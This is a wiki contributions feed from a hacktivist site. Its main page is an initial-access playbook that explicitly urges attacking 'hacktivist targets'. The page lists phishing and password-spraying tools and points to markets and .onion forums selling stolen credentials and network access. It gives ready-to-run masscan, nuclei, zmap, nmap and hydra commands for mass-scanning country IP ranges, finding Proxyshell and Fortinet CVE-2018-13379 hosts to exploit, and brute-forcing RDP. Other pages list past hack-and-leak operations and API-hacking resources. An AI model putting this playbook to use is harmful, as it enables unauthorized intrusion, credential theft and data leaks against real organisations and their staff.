Enlace Hacktivista - User contributions [en]

Initial Access Tactics, techniques and procedures

2024-10-08T11:55:20Z

Booda:

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://exposed.lol
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])
* https://ramp4u.io [Free & Paid] ([http://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Networks ===

==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

If the output from the scans is too large, then you can use the [https://linux.die.net/man/1/split split] command to break the output file up into smaller files and scan against those via multiple [https://linux.die.net/man/1/screen screen] windows/sessions to make your scanning more efficient.

* <code>split -l 10000 results.txt results_</code>

'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Cyber Partisans - KGB

2024-05-09T12:35:20Z

Booda: /* References */

[[File:Belarus_Cyber_Partisans_logo.jpg|350px|border|#The Cyber Partisans Hacktivists]]

== References ==
* https://en.wikipedia.org/wiki/Cyber_Partisans
* https://enlacehacktivista.org/index.php/Cyber_Partisans
* YouTube - Seytonic: https://youtu.be/-3GbwsKWlOA?si=HLTZa-P4xWBs88FQ&t=233
* https://www.by.cpartisans.org/en/post/leak-of-denunciations-to-the-kgb-about-40-thousand-appeals-on-the-kgb-website-over-9-years
* https://www.by.cpartisans.org/en/post/kgb-officers-can-now-be-verified-by-anyone
* https://apnews.com/article/belarus-cyberattack-kgb-dissent-efc7e6acd9dfe8a118e1d2f526c4d6fa

Cyber Partisans - KGB

2024-05-09T12:33:44Z

Booda: Cyber Partisans FSB Hack & Leak

[[File:Belarus_Cyber_Partisans_logo.jpg|350px|border|#The Cyber Partisans Hacktivists]]

== References ==
* https://enlacehacktivista.org/index.php/Cyber_Partisans
* YouTube - Seytonic: https://youtu.be/-3GbwsKWlOA?si=HLTZa-P4xWBs88FQ&t=233
* https://www.by.cpartisans.org/en/post/leak-of-denunciations-to-the-kgb-about-40-thousand-appeals-on-the-kgb-website-over-9-years
* https://www.by.cpartisans.org/en/post/kgb-officers-can-now-be-verified-by-anyone
* https://apnews.com/article/belarus-cyberattack-kgb-dissent-efc7e6acd9dfe8a118e1d2f526c4d6fa

File:Belarus Cyber Partisans logo.jpg

2024-05-09T12:31:35Z

Booda:

Hacker History

2024-05-09T12:26:52Z

Booda: /* 2024 */

== 2005 ==
* [[Protest Warrior]]

== 2008 ==
* [[Sarah Palin emails]]

== 2010 ==
* [[SRS Electronic Declaration System]]
* [[Operation Payback]]

== 2011 ==
* [[Chinga la Migra]]
* [[CorruptBrazil]]
* [[Fuck FBI Friday]]
* [[HBGary]]
* [[LeakyMails]]
* [[Shooting Sheriffs Saturday]]
* [[Sownage]]
* [[Stratfor]]
* [[RedHack]]
* [[LulzSec Sony]]

== 2012 ==
* [[Apple UDIDs]]
* [[CSLEA]]
* [[Norton AntiVirus]]
* [[Syria emails]]
* [[Bureau Of Justice]]
* [[CabinCr3w]]
* [[TheGEOGroup]]

== 2013 ==
* [[Project AIG]]

== 2014 ==
* [[LulzSecPeru]]
* [[Gamma Group]]
* [[Russian Interior Ministry]]

== 2015 ==
* [[wikipedia:Football Leaks]]
* [[Hacking Team]]

== 2016 ==
* [[Berat Albayrak Emails]]
* [[Panama Papers]]
* [[Surkov Leaks]]
* [[Catalan police union]]

== 2017 ==
* [[Bob Otto emails]]
* [[Cellebrite]]
* [[Flexispy]]
* [[Freedom Hosting II]]

== 2018 ==
* [[Salvini emails]]
* [[Doxxing-Adventskalender]]

== 2019 ==
* [[GorraLeaks]]
* [[Paco Leaks]]
* [[Milico Leaks]]
* [[Capital One]]
* [[GdP (Hambacher Forest)]]
* [[Perceptics]]
* [[Cayman National Bank and Trust (Isle of Man)]]
* [[Iron March]]
* [[Varela Leaks]]

== 2020 ==
* [[Luanda Leaks]]
* [[BlueLeaks]]
* [[Intel exconfidential Lake]]

== 2021 ==
* [[Gab]]
* [[Myanmar Investments]]
* [[American Patriots Three Percent‎]]
* [[Verkada]]
* [[Sons of Confederate Veterans]]
* [[MagaCoin]]
* [[Electronic Arts]]
* [[Tea Party Patriots]]
* [[Cyber Partisans]]
* [[HART]]
* [[Policía Nacional Civil de El Salvador]]
* [[Epik]]
* [[Oath Keepers]]
* [[America's Frontline Doctors]]
* [[Twitch]]
* [[Attila Hildmann‎]]
* [[Metropolitan Police Department D.C.]]
* [[Academy of Public Administration (Belarus)]]
* [[AnibalLeaks]]
* [[Texas GOP]]

== 2022 ==
* [[Myanmar Internal Revenue Department]]
* [[Patriot Front]]
* [[Belarusian Railway]]
* [[Pronico]]
* [[Roskomnadzor]]
* [[OpRussia]]
* [[Nauru Police Force]]
* [[Extractivist Leaks/es]]
* [[Uber]]
* [[Liberty Counsel]]
* [[Fiscalia|Fiscalia of Colombia]]
* [[Fuerzas Represivas]]
* [[InfraGard]]

== 2023 ==
* [[Odin Intelligence]]
* [[TSA No Fly List]]
* [[SiegedSec NATO]]
* [[LetMeSpy]]
* [[Greater Manchester Police (GMP)]]
* [[RedAlert]]
* [[WebDetetive]]
* [[SpyHide]]
* [[Rules of engagement - Red Cross]]

== 2024 ==
* [[SiegedSec - #OpTransRights2 ]]
* [[The Post Millennial]]
* [[Cyber Partisans - KGB]]

Hacker History

2024-05-09T12:20:55Z

Booda: /* 2024 */

Hacking APIs

2024-05-05T11:43:50Z

Booda: /* Intercepting proxies */

Web Application Programming Interfaces (APIs) make up [https://www.akamai.com/blog/security/api-discovery-and-profiling-visibility-to-protection 83% of all web traffic] and [https://www.ibm.com/downloads/cas/WMDZOWK6 two thirds of all cloud breaches are due to misconfigured APIs] with developers hard coding credentials and exposing API keys. Organizations are using them more and more to deliver content, handle and transfer data and to implement more functionality into their services and web applications, not to mention APIs have direct back-end database access. Knights [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf white paper] show cases how web APIs can be exploited via [https://owasp.org/www-project-api-security API1:2023 - Broken Object Level Authorization (BOLA)] vulnerability to transfer money in and out of bank accounts and change Visa ATM debit PIN codes. Exploiting web APIs has also been a vector for a lot of [https://www.linkedin.com/pulse/api-exploitation-leading-cause-modern-day-data-gameli-mawudor-phd data breaches].

Currently there is a severe lack of security testing against APIs (mobile APIs especially) from the white hats, not a lot of efforts in testing and protecting APIs and typically organizations "protect" their APIs using WAFs which are ineffective at defending APIs as they are designed to protect web applications and not logic-based exploits.

The top 3 most commonly used web APIs used today (2023) are: Rest, GraphQL and SOAP. Common API data transfer formats are: JSON, XML and YAML. It's an easier attack vector (for now). Learn how to hack web APIs to facilitate your targeted attacks!

See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon Scanning and Recon], [https://enlacehacktivista.org/index.php?title=Search_Engines_Resources Search Engines], [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures Initial Access Tactics, techniques and procedures] and a [https://youtu.be/FqnSAa2KmBI hackers methodology] and [https://youtu.be/p4JgIu1mceI recon] as prerequisite's to hacking APIs.

== Prerequisite reading ==
* OWASP API Security Top 10: https://owasp.org/www-project-api-security | https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf
* (Book) Hacking APIs: Breaking Web Application Programming Interfaces
* (Book) Black Hat GraphQL: Attacking Next Generation APIs
* API Whitepapers and reports: https://salt.security/resources
* (Book) Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities (Chapter 24 - API Hacking)
* SCORCHED EARTH: [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf HACKING BANKS AND CRYPTOCURRENCY EXCHANGES THROUGH THEIR APIS]
* Exploiting GraphQL: https://blog.assetnote.io/2021/08/29/exploiting-graphql
* HackTricks - GraphQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql

== Testing environments ==
* Completely ridiculous API (crAPI) - Purposefully vulnerable API: https://github.com/OWASP/crAPI
* Damn Vulnerable GraphQL Application - Intentionally vulnerable GraphQL API: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application
* OWASP Juice Shop - Insecure web application (uses Rest APIs): https://github.com/juice-shop/juice-shop
* The Pixi module is a MEAN Stack web app with wildly insecure APIs!: https://github.com/DevSlop/Pixi
* Vulnerable REST API with OWASP top 10 vulnerabilities for security testing: https://github.com/erev0s/VAmPI

=== Labs ===
* HackTheBox (HTB) Academy: [https://academy.hackthebox.com/course/preview/web-service--api-attacks Web Service & API Attacks] [Paid]
* TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop105w OWASP API Security Top 10 - 1] [Paid]
** TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop10d0 OWASP API Security Top 10 - 2] [Paid]

== Tools ==
* A collection of API Security tools and resources: https://github.com/arainho/awesome-api-security
* A comprehensive API hacking framework (A-Z)! MindAPI: https://dsopas.github.io/MindAPI/play
* Decode JSON Web Tokens (Online): https://jwt.io
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token JWT - JSON Web Token]
* A toolkit for testing, tweaking and cracking JSON Web Tokens: https://github.com/ticarpi/jwt_tool
* Obtain GraphQL API schema even if the introspection is disabled: https://github.com/nikitastupin/clairvoyance
* HTTP parameter discovery suite: https://github.com/s0md3v/Arjun
* NSE Script for GraphQL Introspection Check: https://github.com/dolevf/nmap-graphql-introspection-nse
* graphw00f is GraphQL Server Engine Fingerprinting utility: https://github.com/dolevf/graphw00f
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection GraphQL Injection]
* GraphQL Introspection analyzer: https://github.com/gwen001/graphql-introspection-analyzer
* If you have found API keys perhaps in a JavaScript file but are not sure how to test their validity use keyhacks: https://github.com/streaak/keyhacks

=== Intercepting proxies ===
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications, mobile and APIs.
* https://www.usebruno.com (API focused)
* https://portswigger.net/burp (If a WAF is blocking Burpsuite then [https://stackoverflow.com/questions/70129432/how-to-bypass-cloudflare-protection-with-burp try editing your user-agent string])
* https://www.zaproxy.org | [https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap GraphQL Add-on for ZAP] to exploit GraphQL Introspection.

=== Fuzzing ===
* https://github.com/assetnote/kiterunner (API focused)
* https://github.com/ffuf/ffuf
* https://www.kali.org/tools/wfuzz

==== Wordlists ====
[https://github.com/assetnote/kiterunner Kiterunner] word lists:
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/swagger-files.tar
# https://wordlists-cdn.assetnote.io/data/kiterunner/swagger-wordlist.txt
Web API specific word lists:
* A list of 3203 common API endpoints and objects designed for fuzzing: https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d
* A wordlist of API names for web application assessments: https://github.com/chrislockard/api_wordlist
* A collection of API word lists: https://github.com/hAPI-hacker/Hacking-APIs
* GraphQL word list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/graphql.txt

== Exploitation ==
Although API specific exploitation may require scripting or custom payloads to mass scrape data or exploit logic based vulnerabilities it's still worth knowing common payloads and exploit tools for web applications: https://enlacehacktivista.org/index.php?title=Exploitation

The Post Millennial

2024-05-04T00:24:50Z

Booda:

[[File:The_Post_Millennial.jpeg|1000px|border|#The Post Millennial Defacement]]

== References ==
* Defacement archive: https://archive.is/GymQj
* https://x.com/vxunderground/status/1786266989947703552
* https://en.wikipedia.org/wiki/The_Post_Millennial

SiegedSec -

2024-05-04T00:05:04Z

Booda: Inclusion of media links to relevant sources

== References ==
* https://x.com/SiegedSecurity/status/1779995926163272032
* https://x.com/SiegedSecurity/status/1785028574472495463

The Post Millennial

2024-05-03T23:51:01Z

Booda: The Post Millennial HackBack

[[File:The_Post_Millennial.jpeg|1000px|border|#The Post Millennial Defacement]]

== References ==
* https://x.com/vxunderground/status/1786266989947703552
* https://en.wikipedia.org/wiki/The_Post_Millennial

File:The Post Millennial.jpeg

2024-05-03T23:48:24Z

Booda: The Post Millennial conservative website hacked by trans hacktivists

== Summary ==
The Post Millennial conservative website hacked by trans hacktivists

Hacker History

2024-05-03T23:46:52Z

Booda: /* 2024 */

TheGEOGroup

2024-04-16T19:10:32Z

Booda: /* References */

[[File:TheGEOGroupDefaced.jpeg|600px|border|#Antisec defacement]]

== References ==
* https://en.wikipedia.org/wiki/GEO_Group
* https://www.huffpost.com/entry/anonymous-hacks-private-prison-company_n_1300473
* https://x.com/FreeJeremyNet/status/1629970249893437440
* https://zone-h.org/mirror/id/17107967
* https://zone-h.org/mirror/id/17108961
* https://zone-h.org/mirror/id/17107978

SiegedSec -

2024-04-16T19:07:55Z

Booda: Created blank page

TheGEOGroup

2024-04-16T19:07:02Z

Booda: Created page with " #Antisec defacement == References == * https://www.huffpost.com/entry/anonymous-hacks-private-prison-company_n_1300473 * https://x.com/FreeJeremyNet/status/1629970249893437440 * https://zone-h.org/mirror/id/17107967 * https://zone-h.org/mirror/id/17108961 * https://zone-h.org/mirror/id/17107978"

[[File:TheGEOGroupDefaced.jpeg|600px|border|#Antisec defacement]]

== References ==
* https://www.huffpost.com/entry/anonymous-hacks-private-prison-company_n_1300473
* https://x.com/FreeJeremyNet/status/1629970249893437440
* https://zone-h.org/mirror/id/17107967
* https://zone-h.org/mirror/id/17108961
* https://zone-h.org/mirror/id/17107978

File:TheGEOGroupDefaced.jpeg

2024-04-16T18:58:53Z

Booda:

Hacker History

2024-04-16T18:52:03Z

Booda: /* 2012 */

Hacker History

2024-04-16T18:40:20Z

Booda: SiegedSec - #OpTransRights2

== 2005 ==
* [[Protest Warrior]]

== 2008 ==
* [[Sarah Palin emails]]

== 2010 ==
* [[SRS Electronic Declaration System]]
* [[Operation Payback]]

== 2011 ==
* [[Chinga la Migra]]
* [[CorruptBrazil]]
* [[Fuck FBI Friday]]
* [[HBGary]]
* [[LeakyMails]]
* [[Shooting Sheriffs Saturday]]
* [[Sownage]]
* [[Stratfor]]
* [[RedHack]]
* [[LulzSec Sony]]

== 2012 ==
* [[Apple UDIDs]]
* [[CSLEA]]
* [[Norton AntiVirus]]
* [[Syria emails]]
* [[Bureau Of Justice]]
* [[CabinCr3w]]

== 2013 ==
* [[Project AIG]]

== 2014 ==
* [[LulzSecPeru]]
* [[Gamma Group]]
* [[Russian Interior Ministry]]

== 2015 ==
* [[wikipedia:Football Leaks]]
* [[Hacking Team]]

== 2016 ==
* [[Berat Albayrak Emails]]
* [[Panama Papers]]
* [[Surkov Leaks]]
* [[Catalan police union]]

== 2017 ==
* [[Bob Otto emails]]
* [[Cellebrite]]
* [[Flexispy]]
* [[Freedom Hosting II]]

== 2018 ==
* [[Salvini emails]]
* [[Doxxing-Adventskalender]]

== 2019 ==
* [[GorraLeaks]]
* [[Paco Leaks]]
* [[Milico Leaks]]
* [[Capital One]]
* [[GdP (Hambacher Forest)]]
* [[Perceptics]]
* [[Cayman National Bank and Trust (Isle of Man)]]
* [[Iron March]]
* [[Varela Leaks]]

== 2020 ==
* [[Luanda Leaks]]
* [[BlueLeaks]]
* [[Intel exconfidential Lake]]

== 2021 ==
* [[Gab]]
* [[Myanmar Investments]]
* [[American Patriots Three Percent‎]]
* [[Verkada]]
* [[Sons of Confederate Veterans]]
* [[MagaCoin]]
* [[Electronic Arts]]
* [[Tea Party Patriots]]
* [[Cyber Partisans]]
* [[HART]]
* [[Policía Nacional Civil de El Salvador]]
* [[Epik]]
* [[Oath Keepers]]
* [[America's Frontline Doctors]]
* [[Twitch]]
* [[Attila Hildmann‎]]
* [[Metropolitan Police Department D.C.]]
* [[Academy of Public Administration (Belarus)]]
* [[AnibalLeaks]]
* [[Texas GOP]]

== 2022 ==
* [[Myanmar Internal Revenue Department]]
* [[Patriot Front]]
* [[Belarusian Railway]]
* [[Pronico]]
* [[Roskomnadzor]]
* [[OpRussia]]
* [[Nauru Police Force]]
* [[Extractivist Leaks/es]]
* [[Uber]]
* [[Liberty Counsel]]
* [[Fiscalia|Fiscalia of Colombia]]
* [[Fuerzas Represivas]]
* [[InfraGard]]

== 2023 ==
* [[Odin Intelligence]]
* [[TSA No Fly List]]
* [[SiegedSec NATO]]
* [[LetMeSpy]]
* [[Greater Manchester Police (GMP)]]
* [[RedAlert]]
* [[WebDetetive]]
* [[SpyHide]]
* [[Rules of engagement - Red Cross]]

== 2024 ==
* [[SiegedSec - #OpTransRights2 ]]

Learn to hack

2024-04-12T15:52:45Z

Booda: /* General Resources */

This page aims to compile high quality resources for hackers for both the experienced and inexperienced. All books listed on this page can be [https://libgen.lc found] on [https://libgen.fun/ Library Genesis].

Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]

== General Resources ==

Resources that assume little to no background knowledge:
* https://www.hoppersroppers.org/training.html
* https://tryhackme.com/

Resources that assume minimal tech background:
* (book) Penetration Testing: A Hands-On Introduction to Hacking
* [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf Bassterlord Networking Manual (translated)] (Focuses on [https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal exploiting and hacking into networks via Forti SSL VPN])
* [https://web.archive.org/web/20230531144434if_/https://cdn-151.anonfiles.com/vcD868ubz5/08a9b897-1685544763/BasterLord+-+Network+manual+v2.0.pdf Bassterlord Networking Manual v2.0 (translated)] (Focuses on [[VPN brute forcing]])
* Translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]
